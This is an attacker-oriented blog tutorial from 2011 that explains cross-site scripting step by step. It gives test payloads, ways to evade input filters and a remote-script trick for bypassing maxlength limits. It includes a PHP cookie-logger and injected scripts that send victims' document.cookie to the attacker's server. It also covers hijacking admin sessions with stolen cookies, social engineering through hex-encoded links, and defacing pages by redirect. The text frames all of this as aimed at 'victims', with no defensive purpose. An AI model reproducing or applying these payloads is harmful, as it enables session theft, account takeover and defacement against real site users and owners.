Monday, 5 December 2011

XSS Tutorial , Cross Site Scripting Complete Method

XSS Tutorial
XSS is an abbreviation for Cross Site Scripting. It uses an X rather than a C in order to reduce confusion between Cascading Style Sheets and Cross Site Scripting. Follow the steps below to perform an XSS attack.

1. Testing for XSS:
First you must check if the website is vulnerable to an XSS injection.
To do this, find a text input field on the νictim website. The text that you input must be shown somewhere on the website. Some common XSS injection locations are your username, signature, or contact information on a member profile, a post or thread on a forum, or a web search that reflects your search(“You searched for TEXT”).
Once you find a location on the website that fits the above requirements you can input a test injection. Enter <script>alert(1)</script> into the text field and submit the form. It should return an alert(pop up) containing the number 1. Remember to try this in multiple browsers, as some like Google Chrome aren’t affected by all XSS injections and may not create an alert.
read more>>

2. Filter Evasion:
Sometimes your νictims will attempt to protect themselves from XSS injections by implementing poor input filters. Here are a few scenarios:
Scenario 1: If it returns a blank/empty reflection or an “Invalid Input” error then the website is most likely blocking the keywords <script> and </script>. You can bypass this filter simply by changing the case of the script tag. For example, <SCRIPT>alert(1)</SCRIPT> or <ScripT>alert(1)</ScripT>.
Scenario 2: If it returns your script with quotes around it(“<script>alert(1)</script>”) then you can attempt to close the quotes before you start the script. You can do this by adding “> before the script. For example, “><script>alert(1)</alert>. Quotes are negative factors because when placed around the script they convert the script to plain text and don’t allow it to function.
Scenario 3: If it returns your script without the <script> tag(only alert(1)) then it is only removing the tags and not considering the whole input invalid. To bypass this just add another tag around the <script> tag. For example, <sc<script>ript>alert(1)</sc</script>ript>. The filter will automatically remove the tag covering your input, therefore only <script>alert(1)</script> will remain.
Scenario 4: If the website simply won’t allow you to post the script tags or the alert you can attempt to encode your script into hex. You can do this by using Xlate or any other free ASCII to hex converter. Once you get the hex version of the script you can enter it in just as you would do with the ASCII version of the script and it will have the same outcome.
3. MaxLength limitations:
In many cases input fields will have a limit to the amount of characters that can be entered and sometimes your script will exceed that limit. There are a few methods that can be used to bypass this:
Method 1: On some websites you will be able to increase the maximum amount of characters allowed. To change the MaxLength perform the following steps:
1. Right click on the input field
2. Click ‘inspect element’
3. Find the line which holds <input id=”query” type=”text” maxlength=”10″ size=”13″ name=”search_term”> and increase the number after maxlength=”.
4. Submit the form. If it returns an error stating that the information entered in the form was faulty then the website is not vulnerable to this.
Method 2: Upload the script to your server and enter it to use as the source. There are two ways to do this:
1. <img src=’http://YourSite.com/YourScript.js’></img>
2. <script src=’http://YourSite.com/YourScript.js’></script>
4. Attack Vectors:
There are two main types of XSS vulnerabilities, reflected and persistent. A reflected XSS is one in which you fill out an input field of something like a search bar, email subscription field, or anything else that won’t permanently remain on the website and will disappear as soon as you leave the page. These will take effect with the help of Social Engineering. A persistent XSS vulnerability is used in locations on a website such as a comment field, public profile information or anything else that will remain on-site and visible to other people.
If you find a persistent XSS on a website you will be able to run any script that you want which includes having the ability to deface that certain page(which I assume that the majority of you reading this want).
If you find a reflective XSS you’ll be able to run scripts on the site like cookie stealing and CSRF but it will require some social engineering. I consider cookie stealing very useful and will explain why further on in this tutorial but I will also show you how to deface a website via a persistent XSS vulnerability.
Cookie Stealing
1. Find a vulnerable XSSi location on the website. We’ll use Site.com/search.word?=(Script Here).
2. Upload your cookie to a web server. You can use a paid web host like Go Daddy and Host Gator or a free one like x10hosting.com.
3. Open notepad and paste the following:
PHP Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Save it as logger.php.
4. Upload logger.php to the root folder of your web server.
5. Add a file named log.txt to the root folder as well.
6. Add the following script to your XSS injectable url(Replace YourSite.com/logger.php with your site/logger.php).
Code:
<script>document.location="http://www.YourSite.com/logger.php?cookie=" + document.cookie;</script>
If you want to make this less noticeable then you can use another script that redirects them back to the ictim site after they visit your cookie logger:
Code:
<script language= "JavaScript">document.location="http://YourSite.com/logger.php?cookie=" + document.cookie;document.location="http://www.Site.com"</script>
7. Send your target the XSS injected link. For example, ours would be Site.com/search.word?= <script>document.location=”http://www.YourSite.com/logger.php?cookie=” + document.cookie;</script>. If you don’t want your target to see the script you can encode it into hex just like Scenario 4 of Filter Evasion. Only encode the script(everything after Site.com/search.word?= ).
8. You have successfully logged their cookies! Site.com has sent them to your logger and you now have their site.com cookies. Now gather their PHPSESSID or any other session ID cookie that you’ve logged.
9. Download the add-on “Edit This Cookie” for Google Chrome and Mozilla Firefox.
10. Go to edit this cookie and replace your session ID with their’s. Now click ‘Submit Cookie Changes’. You should now be logged in to the admin’s/target’s account. You can now do anything that doesn’t require you to enter their password from making a post or sending a Private Message to (if you’re on an administrator account)deleting threads, maybe defacing the website, or banning members.
Defacing
1. Find a persistent XSS and enter the following script:
Code:
<script>window.location="http://YourSite.com/Deface.html";</script>
Now the page will redirect to your deface.

No comments:

Post a Comment